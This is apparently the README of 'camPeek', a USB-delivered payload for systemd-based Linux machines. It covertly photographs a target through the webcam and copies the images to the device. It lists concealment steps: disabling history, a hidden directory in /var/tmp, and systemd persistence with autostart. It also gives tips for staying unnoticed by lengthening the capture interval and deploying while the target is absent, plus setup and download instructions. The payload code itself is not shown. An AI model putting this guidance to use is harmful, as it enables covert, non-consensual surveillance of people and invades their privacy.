- Title: camPeek
- Description: camPeek payload peeks through targets web cam and capture images and stores them in bunny.
- AUTHOR: drapl0n
- Version: 1.0
- Category: Execution
- Target: Unix-like operating systems with systemd.
- Attackmodes: HID, Storage
CamPeek: camPeek payload is divided into two modules, First peeks through targets web cam and capture images and Second stores them in bunny.
- Robust Payload for capturing targets images.
- No additional dependencies required.
- Persistent.
- Autostart payload on boot.
- Payload is divided into two modules:
- Deployment: In this stage payload is deployed in targets system.
- Exfiltration: Storing saved loot from targets system in bunny.
- Stop storing histroy.
- Grep bunny's mount point of bunny.
- Creating hidden directory in /var/tmp/..... for obfuscation.
- Copying ffmpeg and image capturing mechanism in target's system.
- Creating systemd service for persistance and triggering mechanism for autostart.
- Change time interval of capturing image, more the time interval target gets less suspicious, default time interval is 120 secs. Make changes in
systemBus
on line number4
.
SETUP
: MAGENTAATTACK
: YELLOWFINISH
: GREEN
- Download pre compiled static build of ffmpeg from: https://github.com/drapl0n/temp/releases/download/ffmpeg/ffmpeg and move it in camPeek directory.
- Due to big size of binary, it is not provided in this repo.
- Craete directory name
camPeek
in/loot/
for storing captured images.
FileName | Directory |
---|---|
switch1/payload.txt | /payloads/switch1/ |
switch2/payload.txt | /payloads/switch2/ |
camPeek/ | /payloads/libray/ |
- Deploy first payload during absence of target using
switch1
. - Execute second payload during absence of target to store captured images in bunny using
switch2
.